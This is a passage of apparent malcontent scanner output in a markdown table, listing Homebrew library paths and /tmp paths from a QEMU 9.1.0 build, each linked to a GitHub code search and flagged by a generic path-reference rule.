[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) |
+| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
